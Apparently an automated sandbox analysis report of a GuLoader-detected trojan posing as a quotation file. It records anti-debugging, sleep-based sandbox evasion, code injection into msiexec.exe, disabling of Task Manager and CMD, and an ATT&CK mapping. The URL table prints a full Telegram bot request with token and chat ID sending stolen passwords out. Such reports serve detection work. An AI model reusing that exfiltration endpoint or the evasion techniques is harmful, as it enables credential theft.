          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593970Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6563Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3179Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep count: 32 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -29514790517935264s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1184Thread sleep count: 1181 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1184Thread sleep count: 8643 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599532s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599407s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599282s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599172s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598938s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598813s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598688s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598563s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -598110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597245s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -597016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596903s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596782s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596557s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596438s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596313s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596188s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -596063s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595938s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595828s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595719s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595594s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -595110s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594985s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594860s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594610s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1172Thread sleep time: -593970s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_004060E4 FindFirstFileW,FindClose,0_2_004060E4
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405629
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599172Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598813Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598688Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597245Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596903Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596782Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596557Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596438Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596313Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596188Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596063Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595938Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595594Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593970Jump to behavior
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,(;
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2572130777.000000000862A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\November Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-2947
          Source: C:\Users\user\Desktop\November Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-3088
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_076B0D30 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_076B0D30
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040610B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E90000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_00405DC3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405DC3

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created: DisableTaskMgr 1Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created: DisableCMD 1Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6492, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6492, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          311
          Process Injection
          11
          Masquerading
          OS Credential Dumping211
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          3
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol1
          Clipboard Data
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell
          Logon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion
          Security Account Manager131
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync14
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562309 Sample: November Quotation.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 4 other IPs or domains 2->38 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Multi AV Scanner detection for dropped file 2->52 58 6 other signatures 2->58 8 November Quotation.exe 2 25 2->8         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 34->54 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 file5 22 C:\Users\user\AppData\...\Saddelknapperne.Srv, ASCII 8->22 dropped 60 Suspicious powershell command line found 8->60 12 powershell.exe 28 8->12         started        signatures6 process7 file8 24 C:\Users\user\...24ovember Quotation.exe, PE32 12->24 dropped 26 C:\...26ovember Quotation.exe:Zone.Identifier, ASCII 12->26 dropped 62 Early bird code injection technique detected 12->62 64 Writes to foreign memory regions 12->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 12->66 68 4 other signatures 12->68 16 msiexec.exe 17 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49871, 49881 TELEGRAMRU United Kingdom 16->28 30 checkip.dyndns.com 193.122.130.0, 49859, 49877, 49885 ORACLE-BMC-31898US United States 16->30 32 3 other IPs or domains 16->32 40 Disables CMD prompt 16->40 42 Hides threads from debuggers 16->42 44 Disable Task Manager(disabletaskmgr) 16->44 46 Disables the Windows task manager (taskmgr) 16->46 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          November Quotation.exe61%ReversingLabsWin32.Trojan.GuLoader
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exe61%ReversingLabsWin32.Trojan.GuLoader
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          172.217.19.174
          truefalse
            high
            drive.usercontent.google.com
            142.250.181.1
            truefalse
              high
              reallyfreegeoip.org
              172.67.177.134
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.75false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/8&h5msiexec.exe, 00000005.00000002.2585049907.0000000026365000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgmsiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1857229599.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
